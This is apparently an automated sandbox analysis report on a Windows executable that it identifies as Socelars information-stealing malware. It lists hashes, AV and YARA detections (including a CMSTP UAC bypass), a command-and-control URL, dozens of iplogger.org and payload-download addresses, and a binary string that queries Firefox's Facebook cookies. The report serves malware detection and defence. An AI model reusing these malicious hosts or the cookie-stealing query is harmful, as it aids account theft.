Edit tour

Windows Analysis Report
8A3kk3sc5r.exe

Overview

General Information

Sample Name:	8A3kk3sc5r.exe
Analysis ID:	567602
MD5:	eedfa32e8a73f543f237b4f9ae575176
SHA1:	abf870b3c7bfaff9a0a1bec1fdabb93853696114
SHA256:	1ceb2e740663635ec5944806dc83db30f907c6ea531e57766b46b57a9e250558
Tags:	exeSocelars
Infos:

Detection

Socelars

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Yara detected Socelars

Multi AV Scanner detection for domain / URL

Machine Learning detection for sample

May check the online IP address of the machine

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Enables driver privileges

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Enables security privileges

Found large amount of non-executed APIs

Classification

Process Tree

System is w10x64

8A3kk3sc5r.exe (PID: 4360 cmdline: "C:\Users\user\Desktop\8A3kk3sc5r.exe" MD5: EEDFA32E8A73F543F237B4F9AE575176)

WerFault.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 1916 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Socelars

{"C2 url": "http://ngdatas.pw/"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
8A3kk3sc5r.exe	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
8A3kk3sc5r.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x146b58:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x146ba8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1459c0:$s1: CoGetObject 0x146a14:$s2: Elevation:Administrator!new:

Memory Dumps

Source	Rule	Description	Author
00000001.00000000.306336689.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
Process Memory Space: 8A3kk3sc5r.exe PID: 4360	JoeSecurity_Socelars	Yara detected Socelars	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.8A3kk3sc5r.exe.d90000.2.unpack	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
1.0.8A3kk3sc5r.exe.d90000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x146b58:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x146ba8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1459c0:$s1: CoGetObject 0x146a14:$s2: Elevation:Administrator!new:
1.0.8A3kk3sc5r.exe.d90000.1.unpack	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
1.0.8A3kk3sc5r.exe.d90000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x146b58:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x146ba8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1459c0:$s1: CoGetObject 0x146a14:$s2: Elevation:Administrator!new:
1.2.8A3kk3sc5r.exe.d90000.0.unpack	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
1.2.8A3kk3sc5r.exe.d90000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x146b58:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x146ba8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1459c0:$s1: CoGetObject 0x146a14:$s2: Elevation:Administrator!new:
1.0.8A3kk3sc5r.exe.d90000.0.unpack	JoeSecurity_Socelars	Yara detected Socelars	Joe Security
1.0.8A3kk3sc5r.exe.d90000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x146b58:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x146ba8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1459c0:$s1: CoGetObject 0x146a14:$s2: Elevation:Administrator!new:
Click to see the 3 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 8A3kk3sc5r.exe

Malware Configuration Extractor: Socelars {"C2 url": "http://ngdatas.pw/"}

Multi AV Scanner detection for submitted file

Source: 8A3kk3sc5r.exe	Virustotal: Detection: 64%			Perma Link
Source: 8A3kk3sc5r.exe	ReversingLabs: Detection: 74%

Antivirus / Scanner detection for submitted sample

Source: 8A3kk3sc5r.exe	Avira: detected
Source: 8A3kk3sc5r.exe	Avira: detected

Antivirus detection for URL or domain

Source: http://www.tpyyf.com	Avira URL Cloud: Label: malware
Source: https://www.listincode.com/i	Avira URL Cloud: Label: malware
Source: http://www.tpyyf.com/Home/Index/getdata	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.listincode.com

Virustotal: Detection: 7%

Perma Link

Machine Learning detection for sample

Source: 8A3kk3sc5r.exe

Joe Sandbox ML: detected

Source: 1.0.8A3kk3sc5r.exe.d90000.2.unpack	Avira: Label: JS/SpyBanker.G2
Source: 1.0.8A3kk3sc5r.exe.d90000.1.unpack	Avira: Label: JS/SpyBanker.G2
Source: 1.0.8A3kk3sc5r.exe.d90000.0.unpack	Avira: Label: JS/SpyBanker.G2
Source: 1.2.8A3kk3sc5r.exe.d90000.0.unpack	Avira: Label: JS/SpyBanker.G2

Source: 8A3kk3sc5r.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 149.28.253.196:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49749 version: TLS 1.2

Source: 8A3kk3sc5r.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking

May check the online IP address of the machine

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

DNS query: name: iplogger.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://ngdatas.pw/

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83
Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: www.listincode.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1GWfv7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748

Source: 8A3kk3sc5r.exe

String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)

Source: 8A3kk3sc5r.exe, 00000001.00000000.305760385.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.301299081.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 8A3kk3sc5r.exe	String found in binary or memory: http://ngdatas.pw/
Source: 8A3kk3sc5r.exe	String found in binary or memory: http://ngdatas.pw/https://www.listincode.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: 8A3kk3sc5r.exe	String found in binary or memory: http://www.channelinfo.pw/index.php/Home/Index/getExe
Source: 8A3kk3sc5r.exe	String found in binary or memory: http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeaband
Source: 8A3kk3sc5r.exe	String found in binary or memory: http://www.tpyyf.com
Source: 8A3kk3sc5r.exe	String found in binary or memory: http://www.tpyyf.com/Home/Index/getdata
Source: 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/12QMs7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/12TMs7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/143up7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/14Jup7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/14Qju7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/14ePy7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/169Bx7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/16ajh7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/16xjh7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1746b7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1756b7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/19iM77
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1BBCf7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1CDGu7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1CUGu7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Cr3a7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1DE477
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1G7Sc7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1GWfv7
Source: 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1GWfv7.t
Source: 8A3kk3sc5r.exe, 00000001.00000000.305760385.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1GWfv7Ft
Source: 8A3kk3sc5r.exe, 00000001.00000000.305760385.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1GWfv7Ur
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1GaLz7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Gbzj7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Gczj7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Ghzj7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1GiLz7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Gjzj7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1H3Fa7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1KyTy7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1O2BH
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1OXFG
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1OZVH
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1OhAG
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Pdet7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1RWXp7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1SWks7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Smzs7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Sxzs7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1T79i7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1T89i7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1TBch7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1TCch7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1TW3i7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1TXch7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Tkij7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1UKG97
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1UpU57
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Uts87
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1X8M97
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1XJq97
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1XKq97
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1XSq97
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1Z7qd7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1aaVp7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1b4887
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1bV787
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1fHtp7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1lcZz
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1mxKf7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1pcji7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1pdxr7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1q6Jt7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1rDMq7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1rd8N6
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1rqRg7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1s4qp7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1s5qp7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1spuy7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1uS4i7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1uW6i7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1wnqn7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1x5bg7
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://iplogger.org/1yXwr7
Source: 8A3kk3sc5r.exe, 00000001.00000000.305760385.0000000001248000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000003.302100919.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/Hl
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://prntscr.com/upload.php
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://prntscr.com/upload.phphttps://prntscr.com/upload.php
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://sm.ms/api/v2/upload?inajax=1
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://sm.ms/api/v2/upload?inajax=1https://sm.ms/api/v2/upload?inajax=1
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://www.amazon.com/
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://www.aol.com
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://www.google.com
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://www.google.com/search?q=admob&oq=admob
Source: 8A3kk3sc5r.exe	String found in binary or memory: https://www.listincode.com/
Source: 8A3kk3sc5r.exe, 00000001.00000002.323821044.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.305710248.00000000011DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.listincode.com/i

Source: unknown

DNS traffic detected: queries for: www.listincode.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: www.listincode.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1GWfv7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 149.28.253.196:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49749 version: TLS 1.2

Source: 8A3kk3sc5r.exe, 00000001.00000002.323821044.00000000011DA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 8A3kk3sc5r.exe, type: SAMPLE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.0.8A3kk3sc5r.exe.d90000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.0.8A3kk3sc5r.exe.d90000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.8A3kk3sc5r.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.0.8A3kk3sc5r.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: 8A3kk3sc5r.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 8A3kk3sc5r.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.0.8A3kk3sc5r.exe.d90000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.0.8A3kk3sc5r.exe.d90000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.8A3kk3sc5r.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.0.8A3kk3sc5r.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 1916

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DCB0D0	1_2_00DCB0D0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DA5090	1_2_00DA5090
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DB1030	1_2_00DB1030
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DB59C0	1_2_00DB59C0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DD89E0	1_2_00DD89E0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DEF9B0	1_2_00DEF9B0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DF1170	1_2_00DF1170
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DD4120	1_2_00DD4120
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DD3AE0	1_2_00DD3AE0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DCAA90	1_2_00DCAA90
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DA8A80	1_2_00DA8A80
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DB1A50	1_2_00DB1A50
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DCE250	1_2_00DCE250
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00D97A30	1_2_00D97A30
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00D9B3D0	1_2_00D9B3D0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00D92380	1_2_00D92380
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DA2380	1_2_00DA2380
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DAA380	1_2_00DAA380
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DB3BB0	1_2_00DB3BB0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DCFB50	1_2_00DCFB50
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DF0B50	1_2_00DF0B50
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00D9CB40	1_2_00D9CB40
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DC5370	1_2_00DC5370
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DA1B20	1_2_00DA1B20
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DBDCF0	1_2_00DBDCF0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DEDC80	1_2_00DEDC80
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00D9A440	1_2_00D9A440
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DB9C70	1_2_00DB9C70
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DA65A0	1_2_00DA65A0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00E83D70	1_2_00E83D70
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DDF560	1_2_00DDF560
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DB2ED0	1_2_00DB2ED0
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00DB2690	1_2_00DB2690
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: 1_2_00D98E50	1_2_00D98E50

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: String function: 00DB21F0 appears 34 times
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: String function: 00D981E0 appears 99 times
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: String function: 00D97720 appears 96 times
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Code function: String function: 00D97470 appears 31 times

Source: 8A3kk3sc5r.exe

Static PE information: Resource name: ZIP type: Zip archive data, at least v1.0 to extract

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Process token adjusted: Security

Jump to behavior

Source: 8A3kk3sc5r.exe	Virustotal: Detection: 64%
Source: 8A3kk3sc5r.exe	ReversingLabs: Detection: 74%

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8A3kk3sc5r.exe "C:\Users\user\Desktop\8A3kk3sc5r.exe"
Source: C:\Users\user\Desktop\8A3kk3sc5r.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 1916

Source: C:\Users\user\Desktop\8A3kk3sc5r.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD0.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.winEXE@2/6@2/2

Source: 8A3kk3sc5r.exe, 8A3kk3sc5r.exe, 00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 8A3kk3sc5r.exe, 00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT host,name,value,expiry FROM moz_cookies where host='.facebook.com';
Source: 8A3kk3sc5r.exe, 8A3kk3sc5r.exe, 00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 8A3kk3sc5r.exe, 8A3kk3sc5r.exe, 00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 8A3kk3sc5r.exe, 00000001.00000000.305596513.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp, 8A3kk3sc5r.exe, 00000001.00000000.297416868.0000000000EAB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
